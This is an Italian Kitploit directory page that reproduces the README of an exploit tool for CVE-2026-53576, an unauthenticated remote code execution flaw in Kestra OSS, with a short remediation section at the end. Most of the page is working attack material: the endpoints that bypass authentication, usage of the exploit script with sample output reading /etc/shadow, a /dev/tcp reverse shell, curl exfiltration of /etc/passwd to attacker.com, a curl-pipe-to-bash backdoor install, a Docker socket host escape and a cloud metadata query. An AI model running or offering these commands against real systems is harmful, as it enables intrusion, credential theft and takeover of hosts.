Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-53576 — Exploit RCE non autenticato Kestra (CVE-2026-53576) | Kitploit
Strumenti/GitHubGitHub/tamatahyt/cve-2026-53576
Autenticazione e AutorizzazioneEscalation di PrivilegiExploitSfruttamento di Applicazioni WebEsfiltrazione DatiPost-ExploitPenetration TestingRed TeamingSviluppo PayloadEscape dal Container
GitHub
252 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
tamatahyt/cve-2026-53576

CVE-2026-53576

Exploit RCE non autenticato Kestra (CVE-2026-53576)

Vedi Repository

Exploit RCE non autenticato Kestra (CVE-2026-53576)

Python License Security Kestra

Bypass critico dell'autenticazione che consente l'esecuzione di codice remoto non autenticata

Exploit • Dettagli della vulnerabilità • Impatto • Rimedi


⚠️ DISCLAIMER

Questo strumento è destinato esclusivamente a test di sicurezza educativi e autorizzati.

  • NON usarlo contro sistemi che non possiedi o per i quali non hai un'esplicita autorizzazione scritta al test.
  • NON usarlo per attività illegali.
  • L'autore NON è responsabile di qualsiasi uso improprio di questo strumento.
  • Usalo a TUO RISCHIO.

📋 Indice

  • Panoramica
  • Dettagli della vulnerabilità
  • Utilizzo dell'exploit
  • Installazione
  • Esempi
  • Impatto
  • Rimedi
  • Cronologia
  • Riferimenti
  • Licenza

🔍 Panoramica

CVE-2026-53576 è una vulnerabilità critica in Kestra OSS fino alla versione v1.3.20 che consente l'esecuzione di codice remoto non autenticata tramite un bypass del filtro di autenticazione.

Dettagli chiave

AttributoValore
ID CVECVE-2026-53576
GravitàCritica (9.8 CVSS)
Tipo di vulnerabilitàBypass dell'autenticazione + RCE
Prodotto interessatoKestra OSS
Versioni interessate≤ v1.3.20
Vettore di attaccoRete
Autenticazione richiestaNessuna
Interazione dell'utenteNessuna

🚨 Dettagli della vulnerabilità

Causa principale

Il filtro di autenticazione in Kestra contiene un difetto logico critico:

// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

Questo controlla se qualsiasi richiesta API termina con /configs, invece di corrispondere alla rotta esatta. Ciò consente agli aggressori di bypassare l'autenticazione aggiungendo /configs a qualsiasi endpoint.

Fasi dello sfruttamento

  1. Creare un flusso malevolo → POST /api/v1/main/flows/configs (bypassa l'autenticazione)
  2. Attivare l'esecuzione → POST /api/v1/main/executions/configs/configs (bypassa l'autenticazione)
  3. I comandi vengono eseguiti come root → Compromissione completa del sistema

Endpoint vulnerabili

# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 Utilizzo dell'exploit

Utilizzo di base

python3 kestra_exploit.py <target_ip>

Utilizzo avanzato

# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

Opzioni dei comandi

OpzioneDescrizione
targetIndirizzo IP o hostname del target (obbligatorio)
-p, --portPorta (predefinita: 8080)
--httpsUsa HTTPS invece di HTTP
-c, --commandComando personalizzato da eseguire
--docker-checkVerifica l'accesso al socket Docker
--cleanupElimina il flusso dopo lo sfruttamento
--delayRitardo tra le richieste (predefinito: 2s)

📦 Installazione

Requisiti

pip install requests

Clonare il repository

git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

Verificare l'installazione

python3 kestra_exploit.py --help

🎯 Esempi

Esempio 1: Sfruttamento di base

python3 kestra_exploit.py 192.168.1.100

Output:

============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

Esempio 2: Reverse shell

python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Esempio 3: Esfiltrazione dei dati

python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

Esempio 4: Verifica della fuga dal container Docker

python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 Impatto

Impatto diretto

CategoriaGravitàDescrizione
Riservatezza⚠️ CriticaLeggere qualsiasi file (password, segreti, configurazioni)
Integrità⚠️ CriticaCreare/modificare/eliminare flussi e dati
Disponibilità⚠️ AltaArresto del sistema, esaurimento delle risorse
Autenticazione⚠️ CriticaBypass completo dell'autenticazione di base (Basic-Auth)
Escalation dei privilegi⚠️ CriticaI comandi vengono eseguiti come root (uid=0)
Fuga dal container⚠️ CriticaCompromissione dell'host tramite il socket Docker

Capacità di attacco

Un aggressore non autenticato può:

  1. Eseguire comandi arbitrari come root:

    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. Spostarsi sul sistema host (se il socket Docker è montato):

    docker run -v /:/host --privileged alpine chroot /host
    
  3. Accedere ai metadati cloud (se si è su un provider cloud):

    curl http://169.254.169.254/latest/meta-data/
    

🛡️ Rimedi

Azioni immediate

  1. Spegnere le istanze vulnerabili:

    sudo systemctl stop kestra
    
  2. Bloccare l'accesso pubblico:

    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. Applicare regole firewall:

    • Limitare alle reti interne
    • Usare una VPN per l'accesso amministrativo

Soluzione permanente

  1. Aggiornare Kestra all'ultima versione corretta:
    • Monitorare: https://github.com/kestra-io/kestra
    • Controllare: https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
Scarica lo strumento